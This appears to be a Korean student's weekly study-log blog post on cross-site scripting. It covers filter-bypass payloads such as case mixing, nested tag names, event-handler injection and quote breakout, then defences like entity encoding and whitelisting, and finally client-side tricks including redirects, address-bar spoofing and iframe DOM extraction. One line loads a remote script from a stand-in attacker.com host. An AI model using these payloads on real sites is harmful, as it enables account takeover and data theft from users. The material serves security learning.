[기록일지] 📚 11주차 (XSS 공격 Script / 대응 방안 / Client Script 활용 방안)

XSS Bypass Trick

XSS 우회 전략을 통한 공격 스크립트 삽입 방법

Script Tag (길이 제한)

일반적으로 삽입되는 스크립트 공격은 어느정도 길이가 있게 된다. 그래서 이를 방지하기 위해 script 태그에 대하여 스크립트 태그 내부에 들어가는 길이 제한을 두는 경우가 있다.

$script = $_GET['script'];
$script = substr($script,0,40);

<script> alert(1); </script>

alert(1)과 같이 짧은 것으로 테스트 해보는 경우에는 삽입이 되지만, 길이가 길어지는 경우에 길이 제한에 걸려서 짤리는 경우가 발생한다.

이런 경우에는 긴 스크립트를 삽입할 수 없는 것일까? 그렇지 않다.

<script src="http://attacker.com/xss.js"></script>

위와 같이 xss.js 라는 삽입을 위한 스크립트를 따로 만들어두고 해당 js 파일에 접근하도록 하면 긴 스크립트도 충분히 삽입이 가능해진다.

외부에서 리소스를 받아와서 적용이 가능하다는 것을 인지해야한다.

 

ScRiPt Tag (Filtering)

다음과 같이 'script' 라는 특정 단어를 막고 있는 경우가 있다.

$script = $_GET['script'];
if ($script == 'script')
if (preg_match('/script/',$script))

이런 경우 script 라는 단어만 막는 경우, 대소문자를 혼용함으로써  우회 하는 것이 가능한 경우가 있다. upper / lower 를 통해 막아둔 경우에는 사용이 불가능할 수 있다.

<scRiPt> alert(1); </ScrIpt>

 

scrscriptipt Tag (replace)

다음과 같이 <script> 가 <> 와 같이 script라는 단어가 사라지게(공백으로) 되는 경우가 있다. 

$script = $_GET['script'];
str_replace('script','',$script,);

script 사이에 script라는 단어를 넣어 scrscriptipt 와 같은 식으로 만들어줌으로써 script만 남도록하여 우회가 가능한 경우도 있다.

<scrscriptipt> alert(1); </scrscriptipt>

script를 만약 xcript와 같이 변환해버린다면?!

$script = $_GET['script'];
$result = preg_replace("/script/","xcript",$script);

이렇게 되면 script 태그는 사용할 수 없을 것이다.

여기서 우리는 javascript는 script 태그만을 이용해야하는 것이 아니라는 사실을 인지해야한다.

 

eventHandler

Event Handler를 활용하는 방법이 있다.

Event Handler는 특정 이벤트가 발생했을 때, 코드를 실행한다. (이벤트가 발생 했을 때 이를 인지하여 처리)

1. event Handler를 설정해두고자 하는 HTML element에 속성으로 부여
2. HTML element를 JavaScript로 가져가 Event Listener를 추가

 

HTML tag에 속성을 부여

img 태그를 이용하는 경우 잘못된 src를 보냄으로서 공격이 가능하다.

<img src=x onerror="alert(1)">

src에 요청했는데 자료가 없으면 에러 알림을 보내기 때문에 404 Not Found 에러가 발생하게 되는 것을 이용하는 것이다.

다음과 같은 다양한 핸들러들을 이용할 수 있다. (그 종류는 매우 다양하다.)

onerror, onload, onclick, onmouseover, onplay ...

Tag의 경우에도 다양하게 활용이 가능하다.

img, svg, div 등 다양한 태그로 활용 가능

 

JavaScript Code 이용

addEventListener 를 사용한다.

addEventListener(event, code)

addEventListener는 처리할 이벤트를 첫번째 인자로, 이벤트가 발생했을 때 실행하고자 하는 코드를 두번째 인자 값으로 받는다.

그러므로 원하는 이벤트, 삽입할 코드를 작성하는 방식으로 사용할 수 있다.

 

XSS in href

<a href="javascript:alert(1)">TEST</a>

앵커 태그 a 에서 href 에 스크립트를 삽입할 수 있다.

이를 이용하여 링크 클릭시 리디렉션을 통해 실행되게 할 수 있다.

주소창에 javascript를 직접 입력하는 경우에도 실행이 가능하다.

 

XSS in javascript

script Tag 내에서 XSS가 발생하는 경우에는 " 와 ' 를 활용하여 스크립트를 삽입할 수 있다.

이 경우에는 꺾쇠(angle bracket)가 막혀 있어도 가능하다.

입력하는 값이 script 태그 내부에 있는 경우

<script> var data = "______"; </script>

입력에 ";alert(1);var a =" 와 같이 삽입하는 방식을 취할 수 있다.

<script> var data = ""; alert(1); var a = ""; </script>

그 결과 위와 같이 삽입이 가능해진다.

또한 document.write() 함수를 이용하는 방법도 있다.

document.write(' ');

 

XSS in input

input 태그 내부에 입력값이 들어가는 경우에는 다음과 같이 활용할 수 있다.

<input type="text" onmouseover="alert(1)" >
<input type="text" onfocus="alert(1)" > : 사용자가 눌러야한다.
<input type="text" autofocus onfocus="alert(1)" > : 바로 focus 된다.

 

이와 같이 다양한 우회 전략이 존재한다. javascript에 대해 추가적인 공부를 통해 더 다양한 우회 전략을 익힐 수 있을 것이다.

---

XSS 대응 방안

필터링(Filtering)

필터링이란 사용자의 입력을 제한하는 것이다.

웬만한 공격에 대한 대답을 필터링이라고 퉁 치는 수가 있는데... 이렇게 말하는 것은 공부를 덜한 것처럼 보이게 되니 주의해야한다. 필터링과 비슷하게 느낄 수 있지만 다양한 방식으로 대응하는 것임을 이해해야한다.

BlackList

블랙 리스트 기반 필터링은 특정 단어를 못 들어오게 하는 것이다. 그러므로 필터링 단어에 빠지는 부분이 있을 수 있다. 그래서 우회가 될 가능성이 존재한다. (필터링으로 무조건 다 막을 수 있다는 것은 잘못된 생각이다. 아직 찾지 못 했을뿐 방식이 존재할 가능성이 있다고 보는 것이 맞다.)

결론적으로 블랙리스트 기반 필터링에는 한계가 존재한다.

WhiteList

화이트 리스트 기반 필터링은 특정 단어만 들어오게 하는 것이다.

 

HTML Entity 치환

(HTML 특수문자표)

< ' " > 와 같은 특수 문자들을 HTML Entity 표현 방식으로 치환(변환)한다.

필터링은 해당 문자를 다른것으로 바꾸는 것이기때문에 필터링과는 다르다.
치환! 이라고 한다.

'해당 문자는 아니지만 보여줄때는 해당 문자로 보여주겠다.' 라는 의미이다.

 

HTML Editor 대응 방법

게시판 중 HTML 태그를 허용해주고 싶은 경우에는 어떻게 해야할까?

HTML Editor를 사용하는 경우 Editor의 역할 자체가 하이라이팅을 포함하기 때문에 HTML Entity를 그냥 사용하는 것은 불가능하다는 것이 문제이다.

즉 XSS에 취약할 수 밖에 없고 HTML Editor 자체를 쓰지 않고, 기능을 삭제하는 것을 권장한다.

하지만 어떻게든, 어쩔 수 없이 사용해야한다면 다음과 같이 'HTML Editor 특별 버전' 대응 방안이 존재한다.

Step 1. 파라미터로 받는 데이터에서 HTML 특수 문자들을 전부 HTML Entity로 치환한다.
Step 2. 허용해 줄 tag들을 식별해 HTML 문자들을 다시 HTML 특수문자로 복구한다.
(허용해 줄 tag들을 WhiteList 기반 필터링을 이용하여 해당 tag만 다시 살려준다는 것이다.)
Step 3. 복구한 태그 중 악의적인 eventHandler가 있는지 BlackList 기반으로 필터링한다.

위의 절차를 거치게 된다면 

<img src="http://attacker.com/bad.js">

위와 같이 되어있는 코드가 있더라도 악의적인 이벤트 핸들러가 없다면 실행 자체가 불가능 하기 때문에 상관이 없어진다.

---

Client Script 활용 방안

(이것들을 알고 있으면 CSRF 할 때에 좀 더 편안할 수 있다.)

JavaScript로 할 수 있는 여러가지에 대하여 알아볼 것이다.

Page Redirect

공격자 페이지로 이동시키는 방법이다.

변수를 이용하는 방법

location.href

<script>
location.href="https://www.attacker.com/";

위와 같이 변수를 이용하는 경우 '뒤로가기' 가 가능하다.

 

함수를 이용하는 방법

location.replace

location.replace("https://www.attacker.com/");
</script>

반면 위와 같이 함수를 이용하는 방법의 경우 '뒤로가기' 가 불가능하다.

 

주소창 변조

도메인은 바꿀 수 없지만 경로를 바꿔줄 수 있다.

<script>
history.pushState(null, null, login.php')
</script>

위와 같은 방법으로 원하는 경로의 이름을 바꿔주는 것이 가능하다. 해당 페이지의 코드 이름을 감추고 싶거나, 이름이 길어져서 보기 싫은 경우에 바꿔주는 용도로 사용된다.

 

DOM 객체에 접근

javascript 에서 html에 접근하기 위해서는 document라는 객체에 접근하여 사용한다.

html 코드가 다 나오게 된다.(접근이 가능하다.)

 

javascript로 특정 객체에 접근하는 방법

document 객체

document 객체의 get method를 이용한다.

document.getElementBy 속성( )

HTML 에서 id에 해당하는 name은 유일한 id가 된다. 한 HTML 내부에서 같은 이름의 id 태그는 존재할 수 없다는 것이다.

<html>
<h1 id="name" class="NameClass"></h1>
 </html>

위와 같이 id 가 name인 경우 유일한 이름이 된다는 것이다.

그래서 이를 이용하여 우리는 다음과 같은 방식으로 접근이 가능하다.

 

특정 데이터 접근

document.getElementById('')
유일한 속성으로 하나만 나온다.
document.getElementsByClassName('')
유일한 속성이 아니므로 여러 개가 나올 수 있다.

어떤 속성을 기반으로 불러올 것인지 정하고 document로 찾아본 해당 속성의 이름을 불러오면 되는 것이다.

Element / Elements 와 같이 's'의 차이가 나는 이유는 유일한 속성이냐 아니냐에 따른 것이다.

 

객체에서 속성 값 접근

태그의 속성값을 받아오려면 점(.)을 붙이면 된다.

. 뒤에 속성 값을 붙여서 접근한다.

.id - id 를 가져온다.
.className - class를 가져온다.

<script>
var targetTag = document.getElementsByClassName('ClassName');
targetTag.[속성 이름]
</script>

 

객체 HTML 데이터 접근

내부의 글자를 가져오는 방법은 다음과 같다.

.innerHTML

---

스크립트 사용시 주의사항

script 가 로드 되는 위치

Page가 다 로드된 후에 실행되어야 한다.

(javascript의 실행 시점을 생각해야 한다는 것이다. 이것을 제대로 인지하지 못하는 경우 제대로 로드가 되지 않은 상태에서 진행되어 공격에 실패할 수 있다.)

리디렉션

스크립트는 해당 페이지 안에서만 실행되는 것이다.

때문에 리디렉션 되는 경우 / 시키는 경우에는 스크립트의 효력이 사라지게 된다.

그렇기 때문에 우리는 현재 페이지에서 다른 페이지를 삽입하는 방식을 사용한다.

<iframe>

iframe은 지금 페이지에서 다른 페이지를 하나 더 넣어준다는 것이다.

<iframe src="http://~~~/mypage.php></iframe>

위와 같이 입력하는 경우 해당 창을 열고 그안의 document에서 불러오게 된다.

내부에 태그 id를 붙여 넣어서 이를 불러오는 방식으로 활용할 수 있다.

<iframe src="http://~~~/mypage.php" id="targetFrame"></iframe>
<script> var targetTag = document.getElementById('targetFrame');
var DOMData = targetTag.contentDocument;
DOMData.getElementById('')
#(DOMData 가 document 객체!)
</script>

즉 원하는 빼오고 싶은 데이터를 크사 취약점이 발생하는 곳에서 활용하게 되는 것이다.

---

질문 환영, 수정 및 보완에 대한 지적 환영